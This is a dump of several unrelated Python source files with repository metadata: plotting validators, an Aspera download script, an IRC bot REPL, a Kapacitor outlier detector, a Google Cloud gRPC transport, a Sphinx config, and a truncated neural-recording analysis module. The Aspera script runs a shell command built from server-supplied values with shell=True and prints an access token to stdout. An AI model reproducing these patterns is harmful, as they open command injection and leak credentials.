src/backend/web/handlers/suggestions/tests/suggest_team_media_review_controller_test.py
|
Python
|
mit
| 8,438
|
import _plotly_utils.basevalidators
class ValueValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(self, plotly_name="value", parent_name="isosurface", **kwargs):
super(ValueValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc+clearAxisTypes"),
**kwargs
)
|
plotly/plotly.py
|
packages/python/plotly/plotly/validators/isosurface/_value.py
|
Python
|
mit
| 411
|
'''
HCSvLab Aspera download python script
Sample usage:
python aspera_download.py --key API_KEY --item_list_id 34 --destination ~/Downloads
Be sure to fill in API_URL, ASCP_COMMAND and ASCP_KEY to the correct values on your machine
API_URL: Alveo host you are using; QA URL, Staging URL etc.
ASCP_COMMAND: link to the ascp binary, differs on different systems
ASCP_KEY: link to the openssh key that comes with the aspera connect plugin
'''
import os
import argparse
import urllib2
import urllib
import json
import tempfile
import subprocess
API_URL = "https://alveo-qa.intersect.org.au"
ASCP_COMMAND = "ascp"
ASCP_KEY = "~/asperaweb_id_dsa.openssh"
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--key', required=True, action="store", type=str, help="Alveo API key")
parser.add_argument('--item_list_id', required=True, action="store", type=int, help="Item list id")
parser.add_argument('--destination', required=True, action="store", type=str, help="Download destination")
args = parser.parse_args()
return args
def perform_transfer(transfer_spec, destination):
spec = json.loads(transfer_spec)["transfer_spec"]
args = [ASCP_COMMAND]
args.extend(["-i", ASCP_KEY])
args.extend(["-O", str(spec["fasp_port"])])
args.extend(["-P", str(spec["ssh_port"])])
args.extend(["-l", str(spec["target_rate_kbps"])])
args.extend(["-y", "1"])
args.extend(["-t", str(spec["http_fallback_port"])])
args.extend(["--policy", spec["rate_policy"]])
args.extend(["--mode", "RECV"])
args.extend(["--host", spec["remote_host"]])
args.extend(["--user", spec["remote_user"]])
with tempfile.NamedTemporaryFile(delete=False) as temp:
for path in spec["paths"]:
temp.write(path["source"] + "\n")
temp.write(path["destination"] + "\n")
args.extend(["--file-pair-list", temp.name])
args.append(destination)
# print(args)
token = spec["token"]
# print(token)
env = os.environ.copy()
env["ASPERA_SCP_TOKEN"] = token
print("export ASPERA_SCP_TOKEN=" + token)
print(" ".join(args))
subprocess.call(" ".join(args), env=env, shell=True)
# APIError is raised below but was never defined or imported; a minimal
# definition matching the call signature (code, reason, msg) is added here.
class APIError(Exception):
    def __init__(self, code, reason, msg):
        Exception.__init__(self, "%s %s: %s" % (code, reason, msg))
def perform_api_download(key, item_list_id, destination):
headers = {'X-API-KEY': key, 'Accept': 'application/json'}
url = API_URL + '/item_lists/' + str(item_list_id) + '/aspera_transfer_spec'
    req = urllib2.Request(url, data=urllib.urlencode({}), headers=headers)  # empty POST body; a raw dict is not valid urllib2 data
try:
opener = urllib2.build_opener(urllib2.HTTPHandler())
response = opener.open(req)
except urllib2.HTTPError as err:
raise APIError(err.code, err.reason, "Error accessing API")
transfer_spec = response.read()
perform_transfer(transfer_spec, destination)
if __name__ == '__main__':
args = get_arguments()
perform_api_download(args.key, args.item_list_id, args.destination)
|
IntersectAustralia/hcsvlab
|
script/aspera_download.py
|
Python
|
gpl-3.0
| 2,801
|
"""
_____________________________________________
___ < trtl - TwistedBot REPL for Testing Libraries >_
//_\\\\ _ ---------------------------------------------
/_|_|_('> /
" "
"""
import os
import sys
import traceback
import readline
import re
regex = re.compile("\x03(?:\d{1,2}(?:,\d{1,2})?)?", re.UNICODE)
sys.path.append("./modules/")
TO_LOAD = [filename[:-3] for dirname, dirnames, filenames in os.walk('./modules') for filename in filenames if filename[-3:] == ".py"]
MODULES = {}
from test.fake_tbot import TestedBot
TBOT = TestedBot()
for module in TO_LOAD:
try:
MODULES[module] = __import__(module)
for function in dir(MODULES[module]):
glob = MODULES[module].__dict__[function]
if hasattr(glob, 'rule'):
TBOT.register(glob, function)
except:
pass
USER = "[USER]"
CHANNEL = "[CHANNEL]"
print __doc__
while True:
try:
msg = raw_input("> ")
except EOFError:
print ""
print "Bye!"
sys.exit()
except KeyboardInterrupt:
print ""
print "Bye!"
sys.exit()
if msg and msg[0] == "/":
try:
(command, value) = msg.split(" ", 1)
except:
command = msg
if command == "/nick":
USER = value
print "(Nick has changed to '%s')" % USER
elif command == "/j":
CHANNEL = value
print "(Channel has changed to '%s')" % CHANNEL
elif command == "/rules":
print "\n".join(TBOT.rules())
else:
print "(Not a recognised command)"
else:
try:
TBOT.listen(USER, CHANNEL, msg)
if [] != TBOT.bot_messages:
print regex.sub('', "\n".join([x[1] for x in TBOT.bot_messages]))
TBOT.bot_messages = []
except:
print traceback.format_exc()
|
andimiller/twistedbot
|
trtl.py
|
Python
|
mit
| 1,914
|
import sys
import json
from agent import Agent, Handler
import udf_pb2
import logging
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s:%(name)s: %(message)s')
logger = logging.getLogger()
# Find outliers via the Tukey method. As defined in the README.md
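# Roughly: sort the batch, estimate the first (Q1) and third (Q3) quartiles,
# compute IQR = Q3 - Q1, and flag points below Q1 - scale*IQR or above
# Q3 + scale*IQR (scale defaults to 1.5).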
class OutliersHandler(Handler):
class state(object):
def __init__(self):
self._entries = []
def reset(self):
self._entries = []
def update(self, value, point):
self._entries.append((value, point))
def outliers(self, scale):
first, third, lower, upper = self.bounds(scale)
outliers = []
# Append lower outliers
for i in range(first):
if self._entries[i][0] < lower:
outliers.append(self._entries[i][1])
else:
break
# Append upper outliers
for i in range(third+1, len(self._entries)):
if self._entries[i][0] > upper:
outliers.append((self._entries[i][1]))
return outliers
def bounds(self, scale):
self._entries = sorted(self._entries, key=lambda x: x[0])
ml, mr, _ = self.median(self._entries)
_, first, fq = self.median(self._entries[:mr])
third, _, tq = self.median(self._entries[ml+1:])
iqr = tq - fq
lower = fq - iqr*scale
upper = tq + iqr*scale
return first, third, lower, upper
def median(self, data):
l = len(data)
m = l / 2
if l%2 == 0:
left = m
right = m + 1
median = (data[left][0]+ data[right][0]) / 2.0
else:
left = m
right = m
median = data[m][0]
return left, right, median
def __init__(self, agent):
self._agent = agent
self._field = None
self._scale = 1.5
self._state = OutliersHandler.state()
def info(self):
response = udf_pb2.Response()
response.info.wants = udf_pb2.BATCH
response.info.provides = udf_pb2.BATCH
response.info.options['field'].valueTypes.append(udf_pb2.STRING)
response.info.options['scale'].valueTypes.append(udf_pb2.DOUBLE)
logger.info("info")
return response
def init(self, init_req):
success = True
msg = ''
for opt in init_req.options:
if opt.name == 'field':
self._field = opt.values[0].stringValue
elif opt.name == 'scale':
self._scale = opt.values[0].doubleValue
elif opt.name == 'as':
self._as = opt.values[0].stringValue
if self._field is None:
success = False
msg += ' must supply field name'
if self._scale < 1.0:
success = False
msg += ' invalid scale must be >= 1.0'
response = udf_pb2.Response()
response.init.success = success
response.init.error = msg[1:]
return response
def snapshot(self):
response = udf_pb2.Response()
response.snapshot.snapshot = ''
return response
def restore(self, restore_req):
response = udf_pb2.Response()
response.restore.success = False
response.restore.error = 'not implemented'
return response
def begin_batch(self, begin_req):
self._state.reset()
# Send an identical begin batch back to Kapacitor
response = udf_pb2.Response()
response.begin.CopyFrom(begin_req)
self._agent.write_response(response)
def point(self, point):
value = point.fieldsDouble[self._field]
self._state.update(value, point)
def end_batch(self, end_req):
outliers = self._state.outliers(self._scale)
response = udf_pb2.Response()
for outlier in outliers:
response.point.CopyFrom(outlier)
self._agent.write_response(response)
# Send an identical end batch back to Kapacitor
response.end.CopyFrom(end_req)
self._agent.write_response(response)
if __name__ == '__main__':
a = Agent()
h = OutliersHandler(a)
a.handler = h
logger.info("Starting Agent")
a.start()
a.wait()
logger.info("Agent finished")
|
alerta/kapacitor
|
udf/agent/examples/outliers/outliers.py
|
Python
|
mit
| 4,428
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers
from google.api_core import gapic_v1
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.asset_v1p2beta1.types import asset_service
from google.protobuf import empty_pb2 # type: ignore
from .base import AssetServiceTransport, DEFAULT_CLIENT_INFO
class AssetServiceGrpcTransport(AssetServiceTransport):
"""gRPC backend transport for AssetService.
Asset service definition.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
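    A hedged construction sketch (``my_credentials`` stands in for any
    ``google.auth`` credentials object)::
        transport = AssetServiceGrpcTransport(credentials=my_credentials)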
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "cloudasset.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "cloudasset.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def create_feed(
self,
) -> Callable[[asset_service.CreateFeedRequest], asset_service.Feed]:
r"""Return a callable for the create feed method over gRPC.
Creates a feed in a parent
project/folder/organization to listen to its asset
updates.
Returns:
Callable[[~.CreateFeedRequest],
~.Feed]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_feed" not in self._stubs:
self._stubs["create_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/CreateFeed",
request_serializer=asset_service.CreateFeedRequest.serialize,
response_deserializer=asset_service.Feed.deserialize,
)
return self._stubs["create_feed"]
@property
def get_feed(self) -> Callable[[asset_service.GetFeedRequest], asset_service.Feed]:
r"""Return a callable for the get feed method over gRPC.
Gets details about an asset feed.
Returns:
Callable[[~.GetFeedRequest],
~.Feed]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_feed" not in self._stubs:
self._stubs["get_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/GetFeed",
request_serializer=asset_service.GetFeedRequest.serialize,
response_deserializer=asset_service.Feed.deserialize,
)
return self._stubs["get_feed"]
@property
def list_feeds(
self,
) -> Callable[[asset_service.ListFeedsRequest], asset_service.ListFeedsResponse]:
r"""Return a callable for the list feeds method over gRPC.
Lists all asset feeds in a parent
project/folder/organization.
Returns:
Callable[[~.ListFeedsRequest],
~.ListFeedsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_feeds" not in self._stubs:
self._stubs["list_feeds"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/ListFeeds",
request_serializer=asset_service.ListFeedsRequest.serialize,
response_deserializer=asset_service.ListFeedsResponse.deserialize,
)
return self._stubs["list_feeds"]
@property
def update_feed(
self,
) -> Callable[[asset_service.UpdateFeedRequest], asset_service.Feed]:
r"""Return a callable for the update feed method over gRPC.
Updates an asset feed configuration.
Returns:
Callable[[~.UpdateFeedRequest],
~.Feed]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "update_feed" not in self._stubs:
self._stubs["update_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/UpdateFeed",
request_serializer=asset_service.UpdateFeedRequest.serialize,
response_deserializer=asset_service.Feed.deserialize,
)
return self._stubs["update_feed"]
@property
def delete_feed(
self,
) -> Callable[[asset_service.DeleteFeedRequest], empty_pb2.Empty]:
r"""Return a callable for the delete feed method over gRPC.
Deletes an asset feed.
Returns:
Callable[[~.DeleteFeedRequest],
~.Empty]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_feed" not in self._stubs:
self._stubs["delete_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/DeleteFeed",
request_serializer=asset_service.DeleteFeedRequest.serialize,
response_deserializer=empty_pb2.Empty.FromString,
)
return self._stubs["delete_feed"]
def close(self):
self.grpc_channel.close()
__all__ = ("AssetServiceGrpcTransport",)
|
googleapis/python-asset
|
google/cloud/asset_v1p2beta1/services/asset_service/transports/grpc.py
|
Python
|
apache-2.0
| 15,773
|
# -*- coding: utf-8 -*-
#
# Diazo documentation build configuration file, created by
# sphinx-quickstart on Tue Nov 2 18:58:07 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Diazo'
copyright = u'2011, Plone Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0b1'
# The full version, including alpha/beta/rc tags.
release = '1.0b1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'haiku'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Diazo"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = 'images/logo.jpg'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Diazodoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Diazo.tex', u'Diazo Documentation',
u'Plone Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'diazo', u'Diazo Documentation',
[u'Plone Foundation'], 1)
]
|
ebrehault/diazo
|
docs/conf.py
|
Python
|
bsd-3-clause
| 6,987
|
from yass.reader import READER
import numpy as np
import os
import parmap
from scipy.interpolate import interp1d
import matplotlib.pyplot as plt
def get_cov(templates):
dat = templates.transpose(0, 2, 1).reshape(-1, templates.shape[1])
dat = dat[:, 30:-30]
dat = dat[dat.ptp(1) > 0.5]
dat = dat - np.mean(dat, 1, keepdims=True)
dat = dat/np.std(dat, 1, keepdims=True)
acov = np.ones(3)
for ii in range(1,3):
acov[ii] = np.mean(dat[:,ii:]*dat[:,:-ii])
cov = np.eye(3)
cov[0,1] = acov[1]
cov[1,0] = acov[1]
cov[1,2] = acov[1]
cov[2,1] = acov[1]
cov[0,2] = acov[2]
cov[2,0] = acov[2]
w, v = np.linalg.eig(cov)
w[w<=0] = 1e-9
cov_half = np.matmul(np.matmul(v, np.diag(np.sqrt(w))), v.T)
return cov_half
def get_noise_samples(cov_half, n_samples):
return np.matmul(np.random.randn(n_samples, 3), cov_half)
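# --- Note on the two helpers above (illustrative, not part of the original) ---
# get_cov appears to estimate lag-1 and lag-2 autocorrelations of standardized
# template waveforms, build the corresponding 3x3 Toeplitz covariance and
# return its symmetric square root; get_noise_samples then draws temporally
# correlated noise for the 3-sample windows used in PTP estimation. A synthetic
# sketch (templates shape: n_units x n_times x n_channels):
#
#     cov_half = get_cov(np.random.randn(5, 100, 10))      # synthetic templates
#     noise = get_noise_samples(cov_half, n_samples=100)    # shape (100, 3)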
def split_templates(templates_dir, ptp_threshold, n_updates, update_time):
# load initial templates
init_templates = np.load(
os.path.join(templates_dir, 'templates_{}sec.npy').format(0))
n_units, n_times, n_channels = init_templates.shape
vis_chans = [None]*n_units
templates_sparse = [None]*n_units
for k in range(n_units):
ptp_ = init_templates[k].ptp(0)
vis_chan_ = np.where(ptp_ > ptp_threshold)[0]
vis_chans[k] = vis_chan_[np.argsort(ptp_[vis_chan_])[::-1]]
templates_sparse[k] = np.zeros((n_updates, n_times, len(vis_chans[k])), 'float32')
for j in range(n_updates):
templates = np.load(os.path.join(templates_dir, 'templates_{}sec.npy').format(
update_time*j)).astype('float32')
for k in range(n_units):
templates_sparse[k][j] = templates[k, :, vis_chans[k]].T
return templates_sparse, vis_chans
def get_data(k, vis_chans_all, templates_sparse, init_templates,
spike_train, scales, shifts, reader_resid,
n_updates, update_time, meta_data_dir, cov_half):
vis_chan = vis_chans_all[k]
templates_unit = templates_sparse[k]
ptps_unit = templates_unit.ptp(1).astype('float32')
n_units, n_times, n_channels = init_templates.shape
# spike times, shifts and scales
idx_ = np.where(spike_train[:, 1]==k)[0]
if len(idx_) > 20000:
idx_ = np.random.choice(idx_, 20000, False)
spt_ = spike_train[idx_, 0]
scale_ = scales[idx_]
shift_ = shifts[idx_]
# get residual
residual, idx_skipped = reader_resid.read_waveforms(spt_, n_times=n_times, channels=vis_chan)
spt_ = np.delete(spt_, idx_skipped)
scale_ = np.delete(scale_, idx_skipped)
shift_ = np.delete(shift_, idx_skipped)
spt_sec = spt_/reader_resid.sampling_rate
# get residual variance and residual ptp
residual_variance = np.zeros((n_updates, len(vis_chan)), 'float32')
ptps_clean = np.zeros((len(residual), len(vis_chan)), 'float32')
ptps_unit = np.zeros((n_updates, len(vis_chan)), 'float32')
for j in range(n_updates):
t_start = update_time*j
t_end = update_time*(j+1)
idx_ = np.where(np.logical_and(spt_sec >= t_start, spt_sec < t_end))[0]
residual_variance[j] = np.var(residual[idx_], axis=0).mean(0)
min_loc = templates_unit[j].argmin(0)
max_loc = templates_unit[j].argmax(0)
min_loc[min_loc < 1] = 1
max_loc[max_loc < 1] = 1
min_loc[min_loc > 99] = 99
max_loc[max_loc > 99] = 99
#min_max_loc = np.stack((min_loc, max_loc), 1)
# get residual ptp
t_range = np.arange(-1, 2)
for ii in range(len(vis_chan)):
f = interp1d(np.arange(n_times), templates_unit[j, :, ii],
'cubic', fill_value='extrapolate')
mins_temp = f((min_loc[ii] + t_range)[:, None] - shift_[idx_]).T
maxs_temp = f((max_loc[ii] + t_range)[:, None] - shift_[idx_]).T
mins_temp *= scale_[idx_][:, None]
maxs_temp *= scale_[idx_][:, None]
mins_ = mins_temp + residual[idx_][:, min_loc[ii] + t_range, ii]
maxs_ = maxs_temp + residual[idx_][:, max_loc[ii] + t_range, ii]
ptps_clean[idx_, ii] = (maxs_.max(1) - mins_.min(1))#*scale_[idx_]
noise_sample = get_noise_samples(cov_half, 2*len(idx_))
ptps_unit[j, ii] = np.mean(np.max(maxs_temp + noise_sample[:len(idx_)], 1) -
np.min(mins_temp + noise_sample[len(idx_):], 1), 0)
# save meta data
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
np.savez(fname_meta_data,
ptps_clean=ptps_clean,
ptps_unit=ptps_unit,
residual_variance=residual_variance,
vis_chan=vis_chan,
update_time=update_time,
spt_sec=spt_sec
)
def get_plot_ptps(save_dir, fname_raw, fname_residual,
fname_spike_train, fname_scales,
fname_shifts, templates_dir,
ptp_threshold, n_col, CONFIG,
units_in=None,
fname_drifts_gt=None,
n_nearby_units=3
):
reader_raw = READER(fname_raw, 'float32', CONFIG)
reader_resid = READER(fname_residual, 'float32', CONFIG)
update_time = CONFIG.deconvolution.template_update_time
# load initial templates
init_templates = np.load(
os.path.join(templates_dir, 'templates_{}sec.npy').format(0))
n_units = init_templates.shape[0]
meta_data_dir = os.path.join(save_dir, 'meta_data')
if not os.path.exists(meta_data_dir):
os.makedirs(meta_data_dir)
figs_dir = os.path.join(save_dir, 'figs')
if not os.path.exists(figs_dir):
os.makedirs(figs_dir)
if units_in is None:
units_in = np.arange(n_units)
units_in = units_in[units_in < n_units]
get_plot_ptps_parallel(
units_in,
reader_raw,
reader_resid,
fname_spike_train,
fname_scales,
fname_shifts,
templates_dir,
meta_data_dir,
figs_dir,
update_time,
ptp_threshold,
n_col,
fname_drifts_gt,
n_nearby_units
)
def get_plot_ptps_parallel(
units_in, reader_raw, reader_resid,
fname_spike_train, fname_scales,
fname_shifts, templates_dir,
meta_data_dir, figs_dir, update_time,
ptp_threshold, n_col, fname_drifts_gt=None, n_nearby_units=3):
# basic info about templates update
n_updates = int(np.ceil(reader_resid.rec_len/reader_raw.sampling_rate/update_time))
# load initial templates
init_templates = np.load(
os.path.join(templates_dir, 'templates_{}sec.npy').format(0))
n_units, n_times, n_channels = init_templates.shape
cov_half = get_cov(init_templates)
# spike train
spike_train = np.load(fname_spike_train)
f_rates = np.zeros(n_units)
a, b = np.unique(spike_train[:, 1], return_counts=True)
f_rates[a] = b
f_rates = f_rates/(reader_raw.rec_len/20000)
# scale and shifts
scales = np.load(fname_scales)
shifts = np.load(fname_shifts)
fname_templates_sprase = os.path.join(meta_data_dir, 'templates_sparse.npy')
